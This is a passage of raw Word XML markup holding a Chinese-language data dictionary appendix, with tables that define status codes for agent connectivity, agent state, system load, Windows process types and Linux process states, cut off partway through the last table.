      <w:bookmarkStart w:id="508" w:name="附录4-数据字典"/>
      <w:bookmarkEnd w:id="506"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录4 数据字典</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="5BF66CC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="_Toc115166327"/>
      <w:bookmarkStart w:id="510" w:name="通信状态"/>
      <w:r>
        <w:t>通信状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F2DB0C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7B81624" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C36229F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DAE270" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1741750F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E30D05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F774D09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED33267" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A772670" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4534798B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0927B313" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="530D90C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="580A66DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="_Toc115166328"/>
      <w:bookmarkStart w:id="512" w:name="agent状态"/>
      <w:bookmarkEnd w:id="510"/>
      <w:r>
        <w:t>Agent状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1361"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5973F75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218ED66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315835FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201B7C15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CACA568" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E38F0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F3E181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B1EEE66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04CDC35B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16526545" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7203BD6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148671F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="156FE40E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64CC3241" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B0CA4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="014D818E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E514884" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008C9ACC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D1B3B72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C45082" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>删除中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F57E01F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="_Toc115166329"/>
      <w:bookmarkStart w:id="514" w:name="系统负载"/>
      <w:bookmarkEnd w:id="512"/>
      <w:r>
        <w:t>系统负载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1355"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A97BE9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93DDBF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="452BFF8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F78AE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A4A21C5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A77936C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585F9E01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="673D6B4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6EC388C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48FE5044" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F5A2867" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CCE03F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FACD64A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E634DD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22AD8A85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A7D53F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71CE8157" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A586DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D3385AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9C434B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A44D26E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="_Toc115166330"/>
      <w:bookmarkStart w:id="516" w:name="windows进程类型"/>
      <w:bookmarkEnd w:id="514"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows进程类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D39828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D49881F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F7F602" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA5A863" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BB7826A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52516775" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17FADB6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC0E255" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C1DB2E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A12E471" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D284EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5441D1E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>后台程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61616915" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A642B2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD8EAC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FB30206" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>windows进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710940B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="517" w:name="_Toc115166331"/>
      <w:bookmarkStart w:id="518" w:name="linux进程状态"/>
      <w:bookmarkEnd w:id="516"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>进程状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4115"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="529AF0A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B049083" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4928B7F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A25AE42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D2B1DFA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0FB008" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE0E98F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386D1E2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可执行状态&amp;运行状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FE36E18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A29EF2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05C8F4F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0969EE30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可中断的睡眠状态, 可处理signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="259D0C34" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13037393" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0675949D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67D30614" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可中断的睡眠状态, 可处理signal, 有延迟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EFC2DD5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
